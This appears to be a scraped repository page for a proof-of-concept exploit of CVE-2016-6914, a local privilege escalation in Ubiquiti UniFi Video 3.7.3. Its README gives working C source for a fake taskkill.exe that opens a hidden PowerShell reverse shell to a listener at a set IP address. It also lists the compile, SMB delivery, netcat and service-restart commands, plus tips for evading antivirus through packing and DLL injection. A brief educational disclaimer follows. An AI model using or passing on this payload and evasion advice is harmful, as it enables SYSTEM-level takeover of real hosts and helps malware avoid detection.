来源

关联漏洞

描述

CVE-2016-6914-UniFiVideo-LPE

介绍

# CVE-2016-6914 - Ubiquiti UniFi Video 3.7.3 LPE PoC

## 🔥 Overview
This repository contains a **proof-of-concept (PoC)** for **CVE-2016-6914**, a **Local Privilege Escalation (LPE)** vulnerability affecting **Ubiquiti UniFi Video 3.7.3**.  

An attacker with **low privileges** can replace a **trusted binary** (`taskkill.exe`) inside `C:\ProgramData\unifi-video\` to execute **malicious code with SYSTEM privileges**.

---

## ⚡ Exploitation
### **Steps to Exploit**
1️⃣ Replace `taskkill.exe` with a **malicious payload** (`exploit.exe`).  
2️⃣ Wait for **UniFi Video Service** to run or manually restart it.  
3️⃣ The **malicious payload executes**, giving a **SYSTEM shell**.  

---

## 🚀 Payloads Included
- ✅ **PowerShell Reverse Shell**
- ✅ **Netcat Reverse Shell**
- ✅ **AV Bypass Techniques**

---

## 📜 PoC Code (PowerShell Reverse Shell)
This payload replaces `taskkill.exe` and launches a **reverse shell**.

```c
#include <windows.h>

int main() {
    system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
    return 0;
}
✅ Compile using MinGW:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
🛠️ Usage Instructions
1️⃣ Set Up SMB Share (for Remote File Delivery)
On Kali, run:
impacket-smbserver share . -smb2support
2️⃣ Start Netcat Listener
nc -lvnp 4444
3️⃣ Deliver Payload to Target Machine
Run the following PowerShell commands on the target system:
copy \\10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe
stop-service UnifiVideoService -Force
start-service UnifiVideoService
4️⃣ Get SYSTEM Shell
Once executed, a SYSTEM shell is opened on your listener!

🛡️ Bypassing Antivirus (AV)
To evade basic AV detection, try: ✔️ Packing Executable (UPX):
upx --best --lzma exploit.exe
✔️ Using Alternative Syscalls instead of system().
✔️ Embedding in Legitimate Processes using DLL Injection.

⚠️ Disclaimer
📢 This PoC is for educational purposes only!
🛑 Unauthorized use is illegal and punishable.
👨‍💻 Use it only in a legal and ethical manner.

Reference:https://www.exploit-db.com/exploits/43390

文件快照

 [4.0K]  /data/pocs/157d840a131abd2b63a60c7d9a8026b0596f63a6
├── [ 600]  exploit.c
├── [111K]  exploit.exe
└── [2.5K]  README.md

0 directories, 3 files

备注